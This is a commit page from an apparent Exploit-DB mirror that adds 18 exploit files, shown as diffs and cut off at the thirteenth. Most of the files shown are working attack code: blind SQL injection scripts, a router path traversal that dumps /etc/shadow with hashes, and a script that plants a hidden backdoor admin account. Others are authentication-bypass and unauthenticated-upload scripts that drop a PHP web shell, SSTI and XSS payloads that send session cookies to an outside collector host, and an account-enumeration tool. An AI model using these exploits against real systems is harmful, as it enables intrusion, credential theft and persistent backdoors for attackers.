bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-07-20

Browse source 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
This commit is contained in:
Exploit-DB 2023-07-20 00:16:46 +00:00
parent 20fe50e6db
commit 3a3c03321c
18 changed files with 1063 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

101
exploits/hardware/remote/51607.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Refence Link: https://cve.report/CVE-2022-28171
# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
'''
Vendor Description:
Hikvision is a world-leading surveillance manufacturer and supplier of
video surveillance and Internet of Things (IoT) equipment for civilian and
military purposes.
Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
execution vulnerabilities such as command injection, Blind SQL injection,
HTTP request smuggling, and reflected cross-site scripting.
This resulted in remote code execution that allows an adversary to execute
arbitrary operating system commands and more. However, an adversary must be
on the same network to leverage this vulnerability to execute arbitrary
commands.
Vulnerability description:
A manual test confirmed that The download type parameter was vulnerable to
Blind SQL injection.I created a Python script to automate and enumerate SQL
versions as the Application was behind the firewall and block all the
requests from SQLmap.
Request Body:
GET
/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
POC:
'''
import requests
import time
url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
# Function to check if the response time is greater than the specified delay
def is_response_time_delayed(response_time, delay):
return response_time >= delay
# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload):
proxies = {
'http': 'http://localhost:8080',
'https': 'http://localhost:8080',
}
params = {
'target': 'makeMaintainLog',
'downloadtype': payload
}
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
'Connection': 'close'
}
start_time = time.time()
response = requests.get(url, headers=headers, params=params,
proxies=proxies)
end_time = time.time()
response_time = end_time - start_time
return is_response_time_delayed(response_time, 20)
# Enumerate the MySQL version
def enumerate_mysql_version():
version_Name = ''
sleep_time = 10 # Sleep time is 10 seconds
payloads = [
f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
SLEEP({sleep_time}), 0))-- -"
for i in range(1, 11)
for mid in range(256)
]
for payload in payloads:
if perform_blind_sql_injection(payload):
mid = payload.split("=")[-1].split(",")[0]
version_Name += chr(int(mid))
return version_Name
# Enumeration is completed
version_Name = enumerate_mysql_version()
print("MySQL version is:", version_Name)

42
exploits/hardware/webapps/51603.py Executable file
View file

@ -0,0 +1,42 @@
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258
#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests
# Set the request parameter
url = sys.argv[1]
def dump_users():
response = requests.get(url)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
exit()
# Decode the xml response into dictionary and use the data
data = response.text
soup = BS(data, features="xml")
logs = soup.find_all("log")
for log in logs:
test = re.search('User (.*?) logged in',str(log))
if test:
print(test.group(0))
def main():
dump_users()
if __name__ == '__main__':
main()

56
exploits/hardware/webapps/51606.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal
# Date: 13/7/2023
# Exploit Author: Anish Feroz (Zeroxinn)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N
---------------------------POC---------------------------
Request
-------
GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Response
--------
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

52
exploits/multiple/local/51571.txt Normal file
View file

@ -0,0 +1,52 @@
## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145
## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.
## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)
<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
## Time spend:
01:30:00

54
exploits/php/webapps/51197.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: PMB 7.4.6 - SQL Injection
# Google Dork: inurl:opac_css
# Date: 2023-01-06
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 7.4.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
URL:
https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
Parameter:
id
-==== Vulnerability Details ====-
URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)
Tests performed:
if(now()=sysdate(),sleep(15),0) => 15.43
if(now()=sysdate(),sleep(6),0) => 6.445
if(now()=sysdate(),sleep(15),0) => 15.421
if(now()=sysdate(),sleep(3),0) => 3.409
if(now()=sysdate(),sleep(0),0) => 0.415
if(now()=sysdate(),sleep(0),0) => 0.413
if(now()=sysdate(),sleep(6),0) => 6.41
Using SQLMAP :
sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"

69
exploits/php/webapps/51593.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
import requests
import argparse
from base64 import b64encode
js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
var cells = rows[i].getElementsByTagName("td");
for (var j = 0; j < cells.length; j++) {
var anchors = cells[j].getElementsByTagName("a");
for (var k = 0; k < anchors.length; k++) {
if (
anchors[k].innerText === "{}" ||
anchors[k].innerText.includes("atob(") ||
anchors[k].querySelector("script") !== null
) {
rows[i].parentNode.removeChild(rows[i]);
}
}
}
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if(!isNaN(userCount)){
userCount--;
userCountElement.textContent = userCount + ' Users';
}"""
payload = "<script>eval(atob('{}'));</script>"
def backdoor(url, username, password):
config_url = url + '/inc/configure.php'
print("[*] Creating admin account...")
r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Hiding admin account...")
base64_js = b64encode(js.format(username).encode()).decode()
xss_payload = payload.format(base64_js)
r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Exploit finished!")
parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()
backdoor(args.url.rstrip('/'), args.username, args.password)

39
exploits/php/webapps/51594.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: phpfm v1.7.9 - Authentication type juggling
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.dulldusk.com/phpfm/
# Software Link: https://github.com/dulldusk/phpfm/
# Version: 1.6.1-1.7.9
# Tested on: Ubuntu 22.04
# CVE : N/A
"""
An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker. This allows an attacker to bypass the login and obtain remote code execution.
A list of vulnerable password hashes can be found here.
https://github.com/spaze/hashes/blob/master/md5.md
"""
import requests
import sys
if len(sys.argv) < 2:
print(f"[*] Syntax: ./{__file__} http://target/")
sys.exit(0)
url = sys.argv[1].rstrip('/') + "/index.php"
payload_name = "shell.php"
payload = '<?php echo "I am a shell"; ?>'
payload_url = url.replace("index.php", payload_name)
headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) }
requests.post(url, headers=headers, files=files)
r = requests.get(payload_url)
if r.status_code == 200:
print(f"[*] Exploit sucessfull: {payload_url}")
print(r.text)
else:
print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )

100
exploits/php/webapps/51595.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
# <?php
# [...]
#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
# [...]
#
# File: admin/booking.php
#
# <?php
# [...]
#104 if (class_exists(($classname = AImporter::controller()))) {
#105 $controller = new $classname();
#106 /* @var $controller JController */
#107 $controller->execute(JRequest::getVar('task'));
#108 $controller->redirect();
#109 }
# [...]
#
# File: admin/controllers/customer.php
#
# <?php
# [...]
#240 function getUserData() {
#241 $user = JFactory::getUser(JRequest::getInt('id'));
#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243 die(json_encode($data));
#244 }
# [...]
#
# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
#
##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep
def enumerateAccounts(options):
i = 1
url = options.url
url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="
while True:
try:
response = requests.get("{}{}".format(url, str(i)))
if response.status_code == 200:
try:
jsondocument = response.json()
if jsondocument["name"] != None:
print(jsondocument)
except requests.exceptions.JSONDecodeError:
raise
else:
break
except Exception as ex:
print(ex)
break
i += 1
def main():
p = argparse.ArgumentParser()
p.add_argument("-u", "--url", type=str, required=True)
parsed = p.parse_args()
try:
t = urllib.parse.urlparse(parsed.url)
except ValueError as ex:
print(ex)
exit()
if not t[0].startswith("http") and not t[0].startswith("https"):
print("Improper URL given.")
exit()
if len(t[1]) == 0:
print("Improper URL given.")
exit()
enumerateAccounts(parsed)
if __name__ == "__main__":
main()

65
exploits/php/webapps/51596.txt Normal file
View file

@ -0,0 +1,65 @@
## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `useremail` parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
was submitted in the useremail parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker easily can steal all information from this
system, like
login credentials, phone numbers and etc.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: useremail (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
RLIKE (SELECT (CASE WHEN (5532=5532) THEN
0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'gHln'='gHln&userpassword=rootadmin
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
'ZWBa'='ZWBa&userpassword=rootadmin
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)
## Time spend:
00:27:00

124
exploits/php/webapps/51597.txt Normal file
View file

@ -0,0 +1,124 @@
#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
1. login to account
2. go to http://localhost/backdrop/?q=admin/config/system/site-information
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. go to svg file (http://localhost/backdrop/files/malas_2.svg)
Request
POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"
My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"
admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"
core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"
home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"
form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"
siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"
system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"
Save configuration
------WebKitForm

53
exploits/php/webapps/51598.sh Executable file
View file

@ -0,0 +1,53 @@
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/
echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo
if [[ $1 == '' ]]; then
echo "No URL specified!"
exit
fi
base_url=$1
unauth_file_upload() {
# CVE-2023-37629 - File upload vuln
echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
echo "done"
curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
if [[ $req == "200" ]]; then
echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
else
echo "Failed to upload a shell"
fi
}
req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
unauth_file_upload
else
echo "Error"
echo "Status Code: $req"
fi

60
exploits/php/webapps/51599.txt Normal file
View file

@ -0,0 +1,60 @@
#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: SSTI
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 13-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Login to test user account
2. Go to Content Manager
3. Add New Content
4. set as
'''
{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}
<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
<img src=YOU_SERVER/{$smarty.cookies.__c}>
'''
to conten_en section.
5.If any user visit to page, Hacker hijack all cookie
payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E
POC Request
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1
Poc Video: https://youtu.be/zq3u3jRpfqM

63
exploits/php/webapps/51600.txt Normal file
View file

@ -0,0 +1,63 @@
